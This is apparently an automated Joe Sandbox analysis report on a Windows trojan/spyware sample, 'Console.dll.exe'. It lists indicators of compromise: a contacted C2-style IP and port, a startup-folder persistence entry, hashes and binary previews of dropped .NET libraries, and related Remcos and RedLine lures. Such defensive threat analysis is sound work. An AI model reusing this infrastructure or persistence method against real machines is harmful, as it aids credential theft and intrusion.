                                                                                                                                                                                  https://anglebug.com/5845chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://github.com/dotnet/runtimeConsole.dll.exe, System.Xml.XmlSerializer.dll.0.dr, System.Reflection.Emit.Lightweight.dll.0.dr, System.Buffers.dll.0.dr, System.Runtime.Serialization.dll.0.dr, System.Reflection.TypeExtensions.dll.0.dr, System.Dynamic.Runtime.dll.0.dr, System.ComponentModel.Primitives.dll.0.dr, System.Diagnostics.Tracing.dll.0.dr, System.Threading.Tasks.Parallel.dll.0.dr, System.Diagnostics.TextWriterTraceListener.dll.0.dr, System.Text.Encodings.Web.dll.0.dr, System.IO.Compression.ZipFile.dll.0.dr, System.Runtime.Serialization.Primitives.dll.0.dr, System.Runtime.InteropServices.RuntimeInformation.dll.0.dr, System.Runtime.InteropServices.dll.0.dr, System.Security.Cryptography.ProtectedData.dll.0.dr, System.Configuration.dll.0.dr, System.Security.Cryptography.Algorithms.dll.0.dr, System.Resources.ResourceManager.dll.0.dr, System.Threading.dll.0.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/5750chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://anglebug.com/4384chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://anglebug.com/6048chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://178.23.190.70:3000/0Console.dll.exe, 00000007.00000002.2000194031.000000000543D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://anglebug.com/3452chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/6041chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://aka.ms/dotnet-warnings/Console.dll.exe, System.ComponentModel.Primitives.dll.0.dr, System.Runtime.Serialization.Primitives.dll.0.dr, System.Runtime.InteropServices.dll.0.dr, System.Threading.dll.0.dr, System.Net.WebSockets.dll.0.dr, Microsoft.CSharp.dll.0.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/4428chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://github.com/dotnet/runtime/issues/71847Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                                                      		high

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      178.23.190.70
                                                                                                                                                                                                      		unknownunknown
                                                                                                                                                                                                      		196724LYNERO-ASDKfalse

                                                                                                                                                                                                      Private

                                                                                                                                                                                                      IP
                                                                                                                                                                                                      127.0.0.1

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1576691
                                                                                                                                                                                                      Start date and time:2024-12-17 12:02:17 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 10m 16s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:13
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:Console.dll.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal76.troj.adwa.spyw.evad.winEXE@14/195@0/2
                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 23.218.208.109, 4.175.87.197
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • VT rate limit hit for: Console.dll.exe

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      13:11:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Domains

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      LYNERO-ASDKRequest for Quotation With Lead Time_docx.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      Purchase Order MIPO2408-0348.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      CFS-0682-2-08 Order.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      DHL Shipment Document Waybill .exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      DHL Shipment Document Waybill NO # 1363232194.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      SC-91048-docs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      Requirement Against PO. No. 242313609.pdf.exeGet hashmaliciousGuLoader, RedLineBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      SecuriteInfo.com.Trojan.NSIS.Injector.28272.29476.exeGet hashmaliciousGuLoader, RedLineBrowse
                                                                                                                                                                                                      • 178.23.190.118
                                                                                                                                                                                                      Price Offer_1200R4 1200R20.exeGet hashmaliciousGuLoader, RedLineBrowse
                                                                                                                                                                                                      • 178.23.190.118

                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\BouncyCastle.Crypto.dllJetBrains.dotPeek.2024.1.3.web.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        JetBrains.dotPeek.2024.1.3.web.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          Salary and Benefits of Director & Digital Marketing position at Toshiba 2023.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            Salary and Benefits of Director & Digital Marketing position at Toshiba 2023.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              Income and Welfare - UNIQLO 2023.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                ist_2023.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  latest _ product _ list _ and _ digital _ development _ campaigns _ 2023. _ Exclusive_list_2023.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    ist_2023.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      latest _ product _ list _ and _ digital _ development _ campaigns _ 2023. _ Exclusive_list_2023.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3318504
                                                                                                                                                                                                                        Entropy (8bit):6.537564216608803
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:C50b59Aj1ZLCpTT2TzAOeJ+KaGxHIkMNqo5wW0DlI6eujzc3:y0b3AjaFZE5WIR3
                                                                                                                                                                                                                        MD5:9FE1A31FDC7B67F5480E936D359EF6C3
                                                                                                                                                                                                                        SHA1:576269A42C0991E90F5E83C8205EB808D7B4D3BA
                                                                                                                                                                                                                        SHA-256:F42B8609854D80D7F81F276340504AA5E82BBE4D73D05080FEF1FCCA2444B4D5
                                                                                                                                                                                                                        SHA-512:7B7CAE9FC0AFCCEE7533971F97AF11E5DEDB54775BBFE45AD94B82BFDA6122E65FB378BD27B2390BFE45AF89438DBB550171F6939FEBCF742034A405B49339A7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: JetBrains.dotPeek.2024.1.3.web.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: JetBrains.dotPeek.2024.1.3.web.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Salary and Benefits of Director & Digital Marketing position at Toshiba 2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Salary and Benefits of Director & Digital Marketing position at Toshiba 2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: Income and Welfare - UNIQLO 2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: ist_2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: latest _ product _ list _ and _ digital _ development _ campaigns _ 2023. _ Exclusive_list_2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: ist_2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: latest _ product _ list _ and _ digital _ development _ campaigns _ 2023. _ Exclusive_list_2023.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..x2..........-1.. ....2...... ........................2......H3...`.................................G-1.O.....2...............2.. ....2.....|.(.p............................................ ............... ..H............text....w2.. ...x2................. ..`.rsrc.........2......z2.............@..@.reloc........2.......2.............@..B................{-1.....H.......T.........................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s',..%..(.... ....o.....o.0...Zo....t....o5(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............R....r...p.(L....o$....(....*..0..I.......sD...s?)..s.(..s.(...(....s3(....,..o%....2...(....sS(....+.....%..ou...*..( ...*..( ...*n .....S...

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Console.deps.json

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):101590
                                                                                                                                                                                                                        Entropy (8bit):4.999114106065548
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:sZSXFt1Y29szfg4KXEQCTe3ZHZuS9WgEfZEKX:AS1t1Ygszfg4KXEQCTe3ZHZuS9WgEhE2
                                                                                                                                                                                                                        MD5:4187BEBAD599F3A199686DB6E5F1539D
                                                                                                                                                                                                                        SHA1:A5026C1E86A9B0A9CF9A9D171397E4850C226496
                                                                                                                                                                                                                        SHA-256:354FED19D9DA1EDB3AEB351BFEFA407DA3AE66194A7DA97F10EF66A9ADC19C0C
                                                                                                                                                                                                                        SHA-512:13F6D10DF46C5EA24794E5CAFDB9DDEF45DE1C15A33AF36AE820E0DF1415E08F41BD5CECEA037A439CDCF1BD11FDF8BFEB450EC29AA2A020851585F50321A9F2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v8.0/win-x86",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v8.0": {},.. ".NETCoreApp,Version=v8.0/win-x86": {.. "Console/1.0.0": {.. "dependencies": {.. "Microsoft.Data.Sqlite.Core": "8.0.10",.. "Microsoft.NET.ILLink.Tasks": "8.0.4",.. "Newtonsoft.Json": "13.0.3",.. "Portable.BouncyCastle": "1.9.0",.. "System.Data.SQLite": "1.0.119",.. "System.Security.Cryptography.ProtectedData": "8.0.0",.. "WebSocket4Net": "0.15.2",.. "WebSocketSharp-netstandard": "1.0.1",.. "runtimepack.Microsoft.NETCore.App.Runtime.win-x86": "8.0.4".. },.. "runtime": {.. "Console.dll": {}.. }.. },.. "runtimepack.Microsoft.NETCore.App.Runtime.win-x86/8.0.4": {.. "runtime": {.. "Microsoft.CSharp.dll": {.. "assemblyVersion": "8.0.0.0",..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Console.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):161792
                                                                                                                                                                                                                        Entropy (8bit):5.713549677483554
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:9ZHRz7kvA8Sinb2q097ncB2UWIYFi9AlDamv55NMSf9rXX2:DtkvA8v3097cMAYFi9uNMerXG
                                                                                                                                                                                                                        MD5:E59541DB8E65B83897783D355AC017E8
                                                                                                                                                                                                                        SHA1:A0D4FBEE9075D14C58DDB41583EBE284939C18AE
                                                                                                                                                                                                                        SHA-256:6DB09F73052CA6629B5B8FD68EC0B32BD92A6F6BD1A98AE9172273B8777D1520
                                                                                                                                                                                                                        SHA-512:FB92C935FB57128B546DDBE06DB87040762E8D90FC2590D47456A10FDD3610D417E974B69FE026C973ED8508360AED14D63D7526646B32498E83B464DEC305A3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..P...&......Fn... ........@.. ....................................`..................................m..O........#...........................m..T............................................ ............... ..H............text...LN... ...P.................. ..`.rsrc....#.......$...R..............@..@.reloc...............v..............@..B................'n......H........8..44............................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. R@.. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0../.........( ...}.......}......|......(...+..|....("...*..0..V........(#......+D.....o$....o%....r;..p(&...('......re..p.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Console.runtimeconfig.json

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):371
                                                                                                                                                                                                                        Entropy (8bit):4.6677211750904615
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:3Hp/hdNyhA0H0b2mwM5BXmJe5S1mvFAQ6NOCUo+K8E7/OyPfKmn5BNTy:dFG0b2voBEe01mlex+K8E7nS2r2
                                                                                                                                                                                                                        MD5:661E35647175F82187DD5C8BB306944A
                                                                                                                                                                                                                        SHA1:F89EED9A621CED974209DFDB10FEE7B642AF2EF1
                                                                                                                                                                                                                        SHA-256:0E2635A3899FB60828C22C14208AAD990CE44ACE0436B6A2644F02D3DA48D545
                                                                                                                                                                                                                        SHA-512:D6909B6D3D28CD6E103E9A22D611D4C6B4DF1E8ADECBEB6B1E10139BA0D738E8087739D3EEE08D370D7EFFFFACBFB72BE6FC7FD62F1130EF58573F5348AFAB1E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:{.. "runtimeOptions": {.. "tfm": "net8.0",.. "includedFrameworks": [.. {.. "name": "Microsoft.NETCore.App",.. "version": "8.0.4".. }.. ],.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false,.. "System.Runtime.Serialization.EnableUnsafeBinaryFormatterSerialization": false.. }.. }..}

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.SqlServer.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):591440
                                                                                                                                                                                                                        Entropy (8bit):6.06924298598343
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:CTiRnMqz14Oc9CxCTROMKahag9QQB6FHK13z6kuyPQG2puGeqVmjaVmnS4bfu65V:RnMqz14OcksHuAu65V
                                                                                                                                                                                                                        MD5:949A71C816089308551D32BC4BFFEA26
                                                                                                                                                                                                                        SHA1:D53C2BA8ED7571BF5F60759D67CC7CAE1ECBCA00
                                                                                                                                                                                                                        SHA-256:BE2BCDC9C0FF4A2865C8E5296F6A3C87C22411FF268E5EFF30FDCF5F8B2561E2
                                                                                                                                                                                                                        SHA-512:9FAD72A10898AE253CC8EC5F708B0856B649528B9CDD0F6851930264BA7246E41C0E13DDC72A1A4550823E3030E15C9D320412DF80B3A968D1056DB0065AD6C3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$............" ..0.................. ........... .......................@............`.................................{...O.......t...............P$... ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...t...........................@..@.reloc....... ......................@..B........................H...........`...........8....]............................................{0...*..{1...*V.(2.....}0.....}1...*...0..;........u......,/(3....{0....{0...o4...,.(5....{1....{1...o6...*.*. #'p )UU.Z(3....{0...o7...X )UU.Z(5....{1...o8...X*.0..X........r...p......%..{0............-.&.+.......o9....%..{1............-.&.+.......o9....(:...*:.(2.....}....*..*J.......s;...(...+*J.......s<...(...+*........s=...(...+%-.&.......s=...(...+*J.......s>...(...+*J.......s=...(...+*.(....s?..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4977744
                                                                                                                                                                                                                        Entropy (8bit):6.096478054710026
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:+VEvjTmOH5S1w66gqvcWLxPkKOeI2y3BzwNZEnq:WEvjPGw8qPLxPnI6P
                                                                                                                                                                                                                        MD5:6999777A429B6A0EFD83AC3115F531CD
                                                                                                                                                                                                                        SHA1:158644373AA9A2C33032C5C07E430A120D7D3754
                                                                                                                                                                                                                        SHA-256:EADBAC604EFE1EA0272D1285F48E358541978AA1D198EF0420B0E522C793B8B4
                                                                                                                                                                                                                        SHA-512:EE21E3203C063950867B8710407130CA40D9FE5F1C07A2D0754D0673EAC0486B80A4286B3D385E35F78FDAEF089DDAF3391085E3DC4117410D654957D2020591
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0...K..........KK.. ....L...... .......................@L.....n.L...`..................................JK.O.....L.$.............K.P$... L......IK.T............................................ ............... ..H............text.....K.. ....K................. ..`.rsrc...$.....L.......K.............@..@.reloc....... L.......K.............@..B.................JK.....H.......<...,.).........h.A.....`IK.......................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. dL.. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0..X........r...p......%..{)............-.&.+.......o2....%..{*........z...-.&.+...z...o2....(3...*..{4...*..{5...*V.(+.....}4.....}5...*...0..;........u......,/(,....{4....{4...o-...,.(.....{5....{5...o/...*.*. ...z )UU.Z(,....{4...o0...X )UU

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.CSharp.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):940208
                                                                                                                                                                                                                        Entropy (8bit):6.808830985340417
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:CzroE32gyU5iW+9whtbSIqHVu9yHlsC/67XBv:ooEmgRF++tbmHVu9yHSXBv
                                                                                                                                                                                                                        MD5:6128502A536B28C2694E33ED8CD3187B
                                                                                                                                                                                                                        SHA1:0CD5F84AD3FCAC9CBEDA4047E6E8649D895A3CFD
                                                                                                                                                                                                                        SHA-256:A44E59EAB4A6E466E3AA24FBC8C945C18E77ED98CEC928D383C54538069AC665
                                                                                                                                                                                                                        SHA-512:95C2F922094E3D32B2B3CB4E9E58097C164C70233E07752735331ACB2F9E45EAB515909E7328D99AFEBD27C30BF28A36636008FB87CC6684CFDC11954E7402AE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:M$............!......... ....................@..........................0......,"....@.............................................`...D....4...0...(.......}...;..p...........................................................`...H............text............................... ..`.data...x...........................@....reloc...}..........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Data.Sqlite.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):173112
                                                                                                                                                                                                                        Entropy (8bit):6.170500775498013
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:BQ62vrFWupMQDF2XExA+Ch9kIDAX22uyZOteOf6GBSilr7DmILr1wEgIxJC/l7V:N2vjQExZM9hADulgA6dEfJCf
                                                                                                                                                                                                                        MD5:A8599D29A7FAE60E6C3B8B0C6287121A
                                                                                                                                                                                                                        SHA1:920A08CAD22B357A0BD57E4AF4F2FAE00A1901A8
                                                                                                                                                                                                                        SHA-256:FB967FAE5437A1A1932D4076760D4DFE893518C9A03E2059C5470AF26755C775
